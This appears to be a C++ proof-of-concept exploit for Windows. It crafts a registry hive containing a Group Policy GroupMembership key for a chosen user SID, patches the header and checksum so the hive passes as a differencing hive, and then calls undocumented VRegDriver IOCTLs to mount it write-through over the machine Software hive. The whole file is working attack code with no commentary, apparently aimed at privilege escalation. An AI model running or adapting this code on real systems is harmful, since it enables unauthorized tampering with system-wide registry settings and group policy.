#include <Windows.h>
#include <winternl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

#define DIFF_HIVE_WRITETHROUGH 2

struct VRP_LOAD_DIFFERENCING_HIVE_INPUT {
  /* +0x00 */HANDLE hJob;
  /* +0x08 */DWORD Unused1;
  /* +0x0c */DWORD DiffHiveFlags;
  /* +0x10 */DWORD LoadFlags;
  /* +0x14 */WORD  MountPointLength;
  /* +0x16 */WORD  HivePathLength;
  /* +0x18 */WORD  BaseLayerPathLength;
  /* +0x1a */WORD  Unused2;
  /* +0x1c */DWORD Unused3;
  /* +0x20 */HANDLE hToken;
  /* +0x28 */WCHAR Buffer[1];
};

static BOOL SetPrivilege(
  HANDLE hToken,          // access token handle
  LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
  BOOL bEnablePrivilege   // to enable or disable privilege
)
{
  TOKEN_PRIVILEGES tp;
  LUID luid;

  if (!LookupPrivilegeValue(
    NULL,            // lookup privilege on local system
    lpszPrivilege,   // privilege to lookup 
    &luid))          // receives LUID of privilege
  {
    printf("LookupPrivilegeValue error: %u\n", GetLastError());
    return FALSE;
  }

  tp.PrivilegeCount = 1;
  tp.Privileges[0].Luid = luid;
  if (bEnablePrivilege)
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
  else
    tp.Privileges[0].Attributes = 0;

  // Enable the privilege or disable all privileges.

  if (!AdjustTokenPrivileges(hToken,
    FALSE,
    &tp,
    sizeof(TOKEN_PRIVILEGES),
    (PTOKEN_PRIVILEGES)NULL,
    (PDWORD)NULL))
  {
    printf("AdjustTokenPrivileges error: %u\n", GetLastError());
    return FALSE;
  }

  if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
  {
    printf("The token does not have the specified privilege. \n");
    return FALSE;
  }

  return TRUE;
}

DWORD CalculateHeaderChecksum(PBYTE header) {
  PDWORD header_data = (PDWORD)header;

  DWORD crc = 0;
  for (INT i = 0; i < 508 / 4; i++) {
    crc ^= header_data[i];
  }

  if (crc == 0xffffffff) {
    crc = 0xfffffffe;
  } else if (crc == 0) {
    crc = 1;
  }

  return crc;
}

BOOL ConvertHiveFile(LPCWSTR lpInHivePath, LPCWSTR lpOutHivePath) {
  FILE* f;
  if (_wfopen_s(&f, lpInHivePath, L"rb") != 0) {
    wprintf(L"Couldn't open \"%s\"\n", lpInHivePath);
    return FALSE;
  }

  fseek(f, 0, SEEK_END);
  size_t size = ftell(f);
  fseek(f, 0, SEEK_SET);

  unsigned char* buffer = (unsigned char*)malloc(size);
  if (buffer == NULL) {
    wprintf(L"Couldn't allocate %zu bytes\n", size);
    fclose(f);
    return FALSE;
  }

  if (fread(buffer, 1, size, f) != size) {
    wprintf(L"Couldn't read all %zu bytes of the input file\n", size);
    free(buffer);
    fclose(f);
    return FALSE;
  }

  fclose(f);

  if (size < 0x1000) {
    wprintf(L"Size %zu smaller than the base block\n", size);
    free(buffer);
    return FALSE;
  }

  //
  // Set _HBASE_BLOCK.Minor to 6.
  //

  buffer[0x18] = 6;

  //
  // Set the 0x2 (differencing hive) flag in _HBASE_BLOCK.Flags.
  //

  buffer[0x90] |= 2;

  //
  // Update _HBASE_BLOCK.CheckSum.
  //

  *(unsigned int*)&buffer[0x1fc] = CalculateHeaderChecksum(buffer);

  if (_wfopen_s(&f, lpOutHivePath, L"w+b") != 0) {
    wprintf(L"Couldn't open \"%s\"\n", lpOutHivePath);
    free(buffer);
    return FALSE;
  }

  if (fwrite(buffer, 1, size, f) != size) {
    wprintf(L"Couldn't write all %zu bytes to the output file\n", size);
    free(buffer);
    fclose(f);
    return FALSE;
  }

  fclose(f);
  free(buffer);

  return TRUE;
}

int wmain(int argc, wchar_t** argv) {
  if (argc != 3) {
    wprintf(L"Usage: %s <path for new hive file> <new user SID>\n", argv[0]);
    return 1;
  }

  //
  // Create an empty hive at the provided path that will later serve as a delta
  // hive.
  //

  HKEY hRootKey;
  LONG st = RegLoadAppKeyW(argv[1], &hRootKey, KEY_ALL_ACCESS, 0, 0);
  if (st != ERROR_SUCCESS) {
    wprintf(L"RegLoadAppKeyW failed with error %d\n", st);
    return 1;
  }

  //
  // Create the necessary key structure in the hive.
  //

  HKEY hGroupPolicyKey;
  st = RegCreateKeyExW(hRootKey,
                       L"Microsoft\\Windows\\CurrentVersion\\Group Policy",
                       0,
                       NULL,
                       0,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hGroupPolicyKey,
                       NULL);
  if (st != ERROR_SUCCESS) {
    wprintf(L"RegCreateKeyExW #1 failed with error %d\n", st);
    return 1;
  }

  HKEY hUserSidKey;
  st = RegCreateKeyExW(hGroupPolicyKey,
                       argv[2],
                       0,
                       NULL,
                       0,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hUserSidKey,
                       NULL);
  if (st != ERROR_SUCCESS) {
    wprintf(L"RegCreateKeyExW #2 failed with error %d\n", st);
    return 1;
  }

  HKEY hGroupMembershipKey;
  st = RegCreateKeyExW(hUserSidKey,
                       L"GroupMembership",
                       0,
                       NULL,
                       0,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hGroupMembershipKey,
                       NULL);
  if (st != ERROR_SUCCESS) {
    wprintf(L"RegCreateKeyExW #3 failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hGroupMembershipKey);
  RegCloseKey(hUserSidKey);
  RegCloseKey(hGroupPolicyKey);
  RegCloseKey(hRootKey);

  //
  // Make the hive file look like a delta hive.
  //

  if (!ConvertHiveFile(argv[1], argv[1])) {
    return 1;
  }

  //
  // Acquire the necessary privileges.
  //

  HANDLE hToken;
  if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
    printf("OpenProcessToken failed with error %u\n", GetLastError());
    return 1;
  }

  if (!SetPrivilege(hToken, SE_BACKUP_NAME, TRUE) ||
      !SetPrivilege(hToken, SE_RESTORE_NAME, TRUE)) {
    printf("Couldn't acquire SeBackupPrivilege/SeRestorePrivilege\n");
    return 1;
  }

  //
  // Create a job object and convert it to a silo.
  //

  HANDLE hJob = CreateJobObject(NULL, NULL);

  JOBOBJECT_EXTENDED_LIMIT_INFORMATION JobLimits;
  memset(&JobLimits, 0, sizeof(JobLimits));
  JobLimits.BasicLimitInformation.LimitFlags = JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE;

  if (!SetInformationJobObject(hJob,
                               JobObjectExtendedLimitInformation,
                               &JobLimits,
                               sizeof(JobLimits))) {
    printf("SetInformationJobObject(JobObjectExtendedLimitInformation) "
           "failed with error %u\n", GetLastError());
    return 1;
  }

  if (!SetInformationJobObject(hJob, JobObjectCreateSilo, NULL, 0)) {
    printf("SetInformationJobObject(JobObjectCreateSilo) failed with error %u\n",
           GetLastError());
    return 1;
  }

  //
  // Open a connection to the VRegDriver object.
  //

  UNICODE_STRING VRegDriverPath;
  RtlInitUnicodeString(&VRegDriverPath, L"\\Device\\VRegDriver");

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &VRegDriverPath, 0, NULL, NULL);

  HANDLE hVRegDriver;
  IO_STATUS_BLOCK IoStatusBlock;

  NTSTATUS Status = NtCreateFile(&hVRegDriver,
                                 SYNCHRONIZE | FILE_READ_DATA | FILE_WRITE_DATA,
                                 &ObjectAttributes,
                                 &IoStatusBlock,
                                 NULL,
                                 0,
                                 0,
                                 FILE_OPEN_IF,
                                 FILE_SYNCHRONOUS_IO_ALERT,
                                 NULL,
                                 0);
  if (!NT_SUCCESS(Status)) {
    printf("Failed to open the VRegDriver with status %.8x\n", Status);
    return 1;
  }

  //
  // Invoke VrpHandleIoctlInitializeJobForVreg.
  //

  if (!DeviceIoControl(hVRegDriver,
                       0x220004,
                       &hJob,
                       sizeof(hJob),
                       NULL,
                       0,
                       NULL,
                       NULL)) {
    printf("The VrpHandleIoctlInitializeJobForVreg IOCTL failed, error %u\n",
      GetLastError());
    return 1;
  }

  //
  // Invoke VrpHandleIoctlLoadDifferencingHive.
  //

  PCWSTR hive_path = argv[1];
  PCWSTR mount_point = L"\\Registry\\User\\Test";
  PCWSTR base_layer = L"\\Registry\\Machine\\Software";

  CONST SIZE_T IoctlBufferSize = sizeof(VRP_LOAD_DIFFERENCING_HIVE_INPUT) +
                                 wcslen(hive_path) * sizeof(WCHAR) +
                                 wcslen(mount_point) * sizeof(WCHAR) +
                                 wcslen(base_layer) * sizeof(WCHAR);

  VRP_LOAD_DIFFERENCING_HIVE_INPUT* HiveDescriptor =
    (VRP_LOAD_DIFFERENCING_HIVE_INPUT*)malloc(IoctlBufferSize);

  memset(HiveDescriptor, 0, IoctlBufferSize);

  HiveDescriptor->hJob = hJob;
  HiveDescriptor->DiffHiveFlags = DIFF_HIVE_WRITETHROUGH;
  HiveDescriptor->LoadFlags = REG_HIVE_NO_RM | REG_IMMUTABLE;
  HiveDescriptor->MountPointLength = wcslen(mount_point) * sizeof(WCHAR);
  HiveDescriptor->HivePathLength = wcslen(hive_path) * sizeof(WCHAR);
  HiveDescriptor->BaseLayerPathLength = wcslen(base_layer) * sizeof(WCHAR);

  PBYTE BufferPtr = (PBYTE)&HiveDescriptor->Buffer[0];

  memcpy(BufferPtr, mount_point, wcslen(mount_point) * sizeof(WCHAR));
  BufferPtr += wcslen(mount_point) * sizeof(WCHAR);

  memcpy(BufferPtr, hive_path, wcslen(hive_path) * sizeof(WCHAR));
  BufferPtr += wcslen(hive_path) * sizeof(WCHAR);

  memcpy(BufferPtr, base_layer, wcslen(base_layer) * sizeof(WCHAR));

  if (!DeviceIoControl(hVRegDriver,
                       0x220008,
                       HiveDescriptor,
                       IoctlBufferSize,
                       NULL,
                       0,
                       NULL,
                       NULL)) {
    printf("The VrpHandleIoctlLoadDifferencingHive IOCTL failed, error %u\n",
           GetLastError());
    return 1;
  }

  printf("Differencing hive loaded. Press ENTER to unload.\n");
  getchar();

  //
  // Close handles etc.
  //

  CloseHandle(hJob);
  free(HiveDescriptor);

  return 0;
}
